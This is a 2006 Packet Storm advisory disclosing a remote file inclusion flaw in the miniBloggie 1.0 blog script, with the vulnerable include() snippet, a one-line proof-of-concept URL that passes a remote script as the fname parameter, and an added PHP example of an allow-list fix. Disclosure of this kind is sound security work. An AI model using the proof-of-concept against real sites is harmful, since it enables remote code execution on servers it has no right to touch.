miniBloggie10.txt

2006-08-27T00:00:00
ID PACKETSTORM:49258
Type packetstorm
Reporter Sh3ll
Modified 2006-08-27T00:00:00

Description

                                        
                                            `---------------------------------------------------------------------------------------  
miniBloggie 1.0 fname Remote File Inclusion  
---------------------------------------------------------------------------------------  
Author : Sh3ll  
Date : 2006/05/01  
HomePage : http://www.sh3ll.ir  
Contact : sh3ll[at]sh3ll[dot]ir  
---------------------------------------------------------------------------------------  
Affected Software Description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Application : miniBloggie   
Version : 1.0  
Vendor : http://www.mywebland.com  
Class : Remote File Inclusion  
Risk : High  
Summary : miniBloggie is a small but effective blog script built on a fast template engine   
for easy customisation. It uses a MySQL database, supports editing and deleting posts, smileys   
and BBCode, and has an administrator login for easy website management.  
  
---------------------------------------------------------------------------------------  
Vulnerability:  
~~~~~~~~~~~~~  
The problem is in cls_fast_template.php: the variable $fname is passed to include() without  
ever having been declared, so its value can be supplied from outside the script.  
---------------------------------cls_fast_template.php---------------------------------  
....  
<?php  
else {  
    fclose($fp);  
    include $fname;   // $fname is never declared in this file, so an external value is included as-is  
    return;  
}  
...  
---------------------------------------------------------------------------------------  
PoC:  
~~~  
http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script]  
  
Solution:  
~~~~~~~~  
Sanitize the variable $fname in cls_fast_template.php  
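One way to carry out that sanitization, shown here as an added example rather than miniBloggie's own code: the template name is read explicitly from the request, checked against an allow-list, and the resolved path is verified to sit inside a fixed template directory before it reaches include(). The directory name, the allowed template names and the `fname` parameter are assumptions for illustration.

```php
<?php
// Added example (not miniBloggie's code). Hardened replacement for the
// pattern "include $fname;" with $fname never declared, where an enabled
// register_globals setting lets a request variable populate it.
// TEMPLATE_DIR and ALLOWED_TEMPLATES are assumed values for illustration.

const TEMPLATE_DIR = __DIR__ . '/templates';
const ALLOWED_TEMPLATES = ['index', 'post', 'admin'];

/**
 * Resolve a template name to a path inside TEMPLATE_DIR, or return null.
 * Only allow-listed names pass, and the final path is re-checked so that
 * traversal ('../'), absolute paths and stream wrappers (http://, ftp://,
 * php://, data:) can never be handed to include().
 */
function resolve_template(string $name): ?string
{
    // 1. allow-list: the only names the application legitimately renders
    if (!in_array($name, ALLOWED_TEMPLATES, true)) {
        return null;
    }
    // 2. defence in depth: the resolved file must live under the template dir
    $path = realpath(TEMPLATE_DIR . '/' . $name . '.html');
    $base = realpath(TEMPLATE_DIR);
    if ($path === false || $base === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render(string $name): void
{
    $path = resolve_template($name);
    if ($path === null) {
        http_response_code(400);   // reject rather than fall back to a guess
        echo 'unknown template';
        return;
    }
    include $path;   // only ever a vetted local file
}

// Take the name from the request explicitly; never rely on register_globals.
// Independently, register_globals=Off and allow_url_include=Off in php.ini
// remove the conditions this class of bug depends on.
render($_GET['fname'] ?? 'index');
```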
----------------------------------------------------------------------------------------  
Note:  
~~~~  
Vendor Contacted, But No Response. So Do a Dirty Patch.  
----------------------------------------------------------------------------------------  
Shoutz:  
~~~~~~  
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena  
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams   